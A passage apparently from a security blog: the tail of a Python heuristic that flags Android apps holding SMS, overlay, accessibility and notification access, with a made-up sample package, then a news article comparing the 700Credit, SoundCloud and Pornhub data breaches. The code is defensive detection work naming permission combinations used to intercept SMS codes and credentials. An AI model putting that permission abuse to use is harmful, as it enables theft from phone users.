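        findings.add("notification access")
    return sorted(findings), ("review" if len(findings) >= 2 else "ok")


# Constructed sample input for a hypothetical package (not a real app).
SAMPLE_DUMP = """\
  Package [com.example.fastloan] (1a2b3c):
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.SYSTEM_ALERT_WINDOW: granted=true
    runtime permissions:
      android.permission.READ_SMS: granted=true, flags=[ USER_SET ]
      android.permission.CAMERA: granted=false, flags=[ USER_SET ]
"""
SAMPLE_ACCESSIBILITY = "com.example.fastloan/com.example.fastloan.HelperService"
SAMPLE_LISTENERS = "null"  # no app has notification access on this device
```

Calling `audit_package("com.example.fastloan", SAMPLE_DUMP, SAMPLE_ACCESSIBILITY, SAMPLE_LISTENERS)` returns the three findings and the verdict "review".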

Mobile threats in 2025 are no longer background noise or the exclusive domain of power users and enthusiasts. For many people, the phone is now the main attack surface—and the main gateway to their money, identity, and personal life.


SoundCloud, Pornhub, and 700Credit all reported data breaches, but the similarities end there

Comparing data breaches is like comparing apples and oranges. They differ on many levels. To news media, the size of the brand, how many users were impacted, and how it was done often dominate the headlines. For victims, what really matters is the type of information stolen. And for the organizations involved, the focus is on how they will handle the incident. So, let’s have a look at the three that showed up in the news feeds today.

700Credit

700Credit is a US provider of credit reports, preliminary credit checks, identity verification, fraud detection, and compliance tools for automobile, recreational vehicle, powersports, and marine dealerships.

In a notice on its website, 700Credit informed media, partners, and affected individuals that it suffered a third-party supply-chain attack in late October 2025. According to the notice, an attacker gained unauthorized access to personally identifiable information (PII), including names, addresses, dates of birth, and Social Security numbers (SSNs). The breach involves data collected between May and October, impacting roughly 5.6 million people.

The supply-chain attack shows how much incident handling matters. Reportedly, 700Credit communicates with more than 200 integration partners through application programming interfaces (APIs). One of those partners was compromised in July but failed to notify 700Credit; the as-yet-unnamed cybercriminals who broke into that third party’s systems then exploited an API used to pull consumer information.

700Credit shut down the exposed third-party API, notified the FBI and FTC, and is mailing letters to victims offering credit monitoring while coordinating with dealers and state regulators.

SoundCloud

SoundCloud is a leading audio streaming platform where users can upload, promote, stream, and share music, podcasts, and other audio content.

SoundCloud posted a notice on its website stating that it recently detected unauthorized activity in an ancillary service dashboard. Ancillary services refer to specialized functions that help maintain stability and reliability. While SoundCloud was containing the attack, it also experienced denial-of-service attacks, two of which temporarily took its web platform offline.

An investigation found that no sensitive data such as financial or password data was accessed. The exposed data consisted of email addresses and information already visible on public SoundCloud profiles. The company estimates the incident affected roughly 20% of its user base.

Pornhub

Pornhub is one of the world’s most visited adult video-sharing websites, allowing users to view content anonymously or create accounts to upload and interact with videos.

Reportedly, Pornhub disclosed that on November 8, 2025, a security breach at third-party analytics provider Mixpanel exposed “a limited set of analytics events for certain users.” Pornhub stressed that this was not a breach of Pornhub’s own systems, and said that passwords, payment details, and financial information were not exposed. Mixpanel, however, disputes that the data originated from its November 2025 security incident.

According to reports, the ShinyHunters ransomware group claims to have obtained about 94 GB of data containing more than 200 million analytics records tied to Pornhub Premium activity. ShinyHunters shared a data sample with BleepingComputer that included a Pornhub Premium member’s email address, activity type, location, video URL, video name, keywords associated with the video, and the time the event occurred.

ShinyHunters has told BleepingComputer that it sent extortion demands to Pornhub, and the nature of the exposed data creates clear risks for blackmail, outing, and reputational harm—even though no Social Security numbers, government IDs, or payment card details are in the scope of the breach.

Comparing apples and oranges

As you can see, these are three very different data breaches. Not just in how they happened, but in what they mean for the people affected.

While email addresses and knowing that someone uses SoundCloud could be useful for phishers and scammers, it’s a long way from the leverage that comes with detailed records of Pornhub Premium activity. If that doesn’t get you on the list of a “hello pervert” scammer, I don’t know what will.

But undoubtedly the most dangerous one for those affected is the 700Credit breach, which provides an attacker with enough information for identity theft. In the other cases an attacker still has to penetrate another defense layer, but with a successful identity theft the attacker has already reached an important goal.

| Aspect | SoundCloud | 700Credit | Pornhub |
|---|---|---|---|
| People affected | Estimated ~28–36 million users (about 20% of users) | ~5.6 million people | “Select” Premium users; ~201 million activity records (not 201 million people) |
| Leaked data | Email addresses and public profile info | Names, addresses, dates of birth, SSNs | Search, watch, and download activity; attacker-shared samples include email addresses, timestamps, and IP/geo-location data |
| Sensitivity level | Low (mostly already public contact/profile data) | Very high (classic identity‑theft PII) | Very high (intimate behavioral and preference data, blackmail/extortion potential) |
| Breach cause | Unauthorized access to an internal service dashboard | Third‑party API compromise (supply‑chain attack) | Disputed incident involving third-party analytics data (Mixpanel), following a smishing campaign |
